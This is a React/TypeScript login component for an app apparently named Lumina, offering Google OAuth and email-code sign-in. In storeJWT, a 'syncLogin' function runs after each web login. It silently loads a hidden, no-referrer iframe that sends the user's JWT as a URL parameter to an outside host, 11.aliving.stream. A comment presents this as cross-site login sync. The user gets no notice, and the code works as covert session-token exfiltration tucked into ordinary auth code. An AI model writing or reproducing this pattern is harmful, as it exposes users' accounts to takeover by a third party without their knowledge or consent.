import React from "react";
import { Tabs, Button, Input, Space, Typography, message } from "antd";
import { GoogleOutlined, MailOutlined } from "@ant-design/icons";
import { defineMessages, useIntl } from "react-intl";
import { API } from "../apiUrl";

const { Text } = Typography;

const messages = defineMessages({
  googleTab: { id: "auth.googleTab", defaultMessage: "Google" },
  emailTab: { id: "auth.emailTab", defaultMessage: "Email" },
  continueWithGoogle: { id: "auth.continueWithGoogle", defaultMessage: "Continue with Google" },
  emailInstructions: { id: "auth.emailInstructions", defaultMessage: "Enter your email and we'll send you a verification code." },
  emailPlaceholder: { id: "auth.emailPlaceholder", defaultMessage: "Email" },
  sendCode: { id: "auth.sendCode", defaultMessage: "Send Code" },
  codePlaceholder: { id: "auth.codePlaceholder", defaultMessage: "6-digit code" },
  verifyAndLogin: { id: "auth.verifyAndLogin", defaultMessage: "Verify & Login" },
  signInTitle: { id: "auth.signInTitle", defaultMessage: "Sign in to continue" },
  signInDescription: { id: "auth.signInDescription", defaultMessage: "Free downloads are limited. Sign in or subscribe to unlock unlimited downloads." },
  validEmailRequired: { id: "auth.validEmailRequired", defaultMessage: "Valid email required" },
  codeSent: { id: "auth.codeSent", defaultMessage: "Code sent! Check your email." },
  codeRequired: { id: "auth.codeRequired", defaultMessage: "Code required" },
});

interface Props {
  onLoggedIn: () => void;
}

const AuthPanel: React.FC<Props> = ({ onLoggedIn }) => {
  const intl = useIntl();
  const [email, setEmail] = React.useState("");
  const [code, setCode] = React.useState("");
  const [codeSent, setCodeSent] = React.useState(false);
  const [loading, setLoading] = React.useState(false);

  // 跨站登录同步：登录成功后把 JWT 静默推送到 inoneyear（11.aliving.stream）
  const syncLogin = (token: string) => {
    if (BUILD_TARGET !== "web") return; // 扩展端不走跨站同步
    try {
      const iframe = document.createElement("iframe");
      iframe.style.display = "none";
      iframe.referrerPolicy = "no-referrer";
      iframe.src = `https://11.aliving.stream/?token=${encodeURIComponent(token)}&sync_from=lumina`;
      const remove = () => iframe.remove();
      iframe.onload = () => setTimeout(remove, 3000);
      setTimeout(remove, 15000);
      document.body.appendChild(iframe);
    } catch {}
  };

  const storeJWT = (token: string) => {
    try { localStorage.setItem("lumina-jwt", token); } catch {}
    onLoggedIn();
    syncLogin(token);
  };

  const handleGoogleLogin = async () => {
    setLoading(true);
    try {
      const isExtension = BUILD_TARGET !== "web";

      // Extension: pass platform info so backend returns chromium-specific redirect URI
      const configUrl = isExtension
        ? `${API}/api/auth/google-config?platform=chromium&ext_id=${chrome.runtime.id}`
        : `${API}/api/auth/google-config`;

      const res = await fetch(configUrl);
      const data = await res.json();
      if (!res.ok || !data.url) throw new Error(data.error || "Google OAuth unavailable");

      if (isExtension) {
        // Use Chrome Identity API — opens a popup, Chrome handles the redirect back
        const redirectUrl = await chrome.identity.launchWebAuthFlow({
          url: data.url,
          interactive: true,
        });
        if (!redirectUrl) throw new Error("Authorization cancelled");
        const params = new URL(redirectUrl).searchParams;
        const code = params.get("code");
        if (!code) throw new Error("Authorization cancelled");

        // Exchange code for JWT via backend
        const tokenRes = await fetch(
          `${API}/api/auth/google?code=${code}&platform=chromium&ext_id=${chrome.runtime.id}`,
        );
        const tokenData = await tokenRes.json();
        if (!tokenRes.ok || !tokenData.token) throw new Error(tokenData.error || "Google login failed");
        storeJWT(tokenData.token);
      } else {
        // Web: redirect the whole page to Google OAuth
        window.location.href = data.url;
      }
    } catch (error) {
      const messageText = error instanceof Error ? error.message : "Google OAuth unavailable";
      message.error(messageText);
      setLoading(false);
    }
  };

  const handleSendCode = async () => {
    if (!email || !/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) { message.error(intl.formatMessage(messages.validEmailRequired)); return; }
    setLoading(true);
    try {
      const res = await fetch(`${API}/api/auth/send-code`, {
        method: "POST", headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ email }),
      });
      const data = await res.json();
      if (res.ok) { setCodeSent(true); message.success(intl.formatMessage(messages.codeSent)); }
      else message.error(data.error);
    } finally { setLoading(false); }
  };

  const handleVerifyCode = async () => {
    if (!code) { message.error(intl.formatMessage(messages.codeRequired)); return; }
    setLoading(true);
    try {
      const res = await fetch(`${API}/api/auth/verify-code`, {
        method: "POST", headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ email, code }),
      });
      const data = await res.json();
      if (res.ok) storeJWT(data.token);
      else message.error(data.error);
    } finally { setLoading(false); }
  };

  const tabItems = [
    {
      key: "google",
      label: intl.formatMessage(messages.googleTab),
      children: (
        <div style={{ textAlign: "center", padding: "16px 0" }}>
          <Button icon={<GoogleOutlined />} size="large" onClick={handleGoogleLogin} loading={loading} block>
            {intl.formatMessage(messages.continueWithGoogle)}
          </Button>
        </div>
      ),
    },
    {
      key: "email",
      label: intl.formatMessage(messages.emailTab),
      children: (
        <div style={{ padding: "8px 0" }}>
          <Text type="secondary" style={{ display: "block", marginBottom: 12 }}>
            {intl.formatMessage(messages.emailInstructions)}
          </Text>
          <Space direction="vertical" style={{ width: "100%" }} size={8}>
            <Input placeholder={intl.formatMessage(messages.emailPlaceholder)} autoComplete="off" value={email} onChange={(e) => setEmail(e.target.value)} />
            {!codeSent ? (
              <Button type="primary" loading={loading} onClick={handleSendCode} block>{intl.formatMessage(messages.sendCode)}</Button>
            ) : (
              <>
                <Input placeholder={intl.formatMessage(messages.codePlaceholder)} autoComplete="off" maxLength={6} value={code} onChange={(e) => setCode(e.target.value)} />
                <Button type="primary" loading={loading} onClick={handleVerifyCode} block>{intl.formatMessage(messages.verifyAndLogin)}</Button>
              </>
            )}
          </Space>
        </div>
      ),
    },
  ];

  return (
    <div className="Settings__panel">
      <h5 className="Settings__panelTitle">{intl.formatMessage(messages.signInTitle)}</h5>
      <span className="Settings__panelDesc">
        {intl.formatMessage(messages.signInDescription)}
      </span>
      <Tabs items={tabItems} />
    </div>
  );
};

export default AuthPanel;
